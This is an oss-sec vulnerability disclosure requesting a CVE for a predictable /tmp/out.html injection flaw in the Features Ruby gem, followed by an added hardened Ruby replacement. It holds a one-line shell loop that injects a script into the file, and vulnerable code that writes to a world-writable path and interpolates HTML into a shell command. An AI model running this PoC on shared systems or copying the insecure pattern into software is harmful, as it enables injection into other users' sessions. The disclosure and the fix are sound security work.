oss-sec mailing list archives

Features 0.3.0 Ruby gem /tmp file injection vulnerability


From: "Larry W. Cashdollar" <larry0 () me com>
Date: Mon, 09 Sep 2013 17:38:46 +0000 (GMT)

Hi, May I have a CVE for the following vulnerability?


Title: Features 0.3.0 Ruby gem /tmp file injection vulnerability

Date: 9/1/2013
Author: Larry W. Cashdollar @_larry0 
Download: http://rubygems.org/gems/features
CVE: TBD
Description: "Plaintext User Stories Parser supporting native programming languages. Especially Objective-C"
Same vulnerability as http://vapid.dhs.org/advisories/show_in_browser.html
A malicious local user who creates /tmp/out.html first and repeatedly writes to it can inject HTML of their choosing into the
file right before it is opened.
PoC:
nobody () sp0rk:/$ while (true); do echo "<script> alert('Hello'); </script>" >> /tmp/out.html; done
Will pop up a JavaScript alert in other gem users' browsers.
Code:
Vulnerable code in ./features-0.3.0/lib/suite.rb (both methods write the rendered HTML to the fixed, world-writable path /tmp/out.html and then open it):

  def parse_results_and_open_in_safari(results)
    html = parse_results(results).html
    %x(touch '/tmp/out.html' && echo '#{html}' > /tmp/out.html && open '/tmp/out.html' )
  end

  def open_in_safari(html)
    %x(touch '/tmp/out.html' && echo '#{html}' > /tmp/out.html && open '/tmp/out.html' )
  end

Vendor: Not notified
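For comparison, a hardened replacement for open_in_safari, added here as an example and not the gem's own code: it creates a uniquely named, owner-only temp file with O_EXCL, so a pre-created or repeatedly rewritten predictable path in /tmp is never reused, and it writes the HTML through Ruby's File API instead of a shell command. The opener keyword and the helper results_file_is_private? are assumptions added for illustration and testing.

```ruby
require 'tempfile'

# Hardened replacement for the gem's open_in_safari (added example, not the
# gem's code). Instead of the fixed, predictable /tmp/out.html it uses a
# fresh, randomly named file that only the current user can read or write,
# and writes the HTML with File I/O rather than interpolating it into a
# shell command line.
#
# opener (assumed parameter): a callable that receives the file path; the
# default hands it to the macOS `open` command without going through a shell.
def open_in_safari_safely(html, opener: ->(path) { system('open', path) })
  # Tempfile.create picks an unpredictable name under Dir.tmpdir and opens it
  # with O_CREAT|O_EXCL and mode 0600, so an existing file or symlink at that
  # name makes creation fail instead of being silently overwritten/followed.
  file = Tempfile.create(['features-results', '.html'])
  path = file.path
  begin
    File.chmod(0o600, path) # owner-only regardless of umask
    file.write(html)        # no shell, so quotes in the HTML are harmless
    file.flush
  ensure
    file.close
  end
  opener.call(path)
  path
end

# Helper (added for the example): true only if the results file is a regular
# file, not a symlink, owned by us and unreadable by group/others.
def results_file_is_private?(path)
  return false if File.symlink?(path)

  st = File.stat(path)
  st.file? && (st.mode & 0o077).zero? && st.uid == Process.euid
end
```

Calling open_in_safari_safely with a no-op opener lets the file properties be checked without launching a browser.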
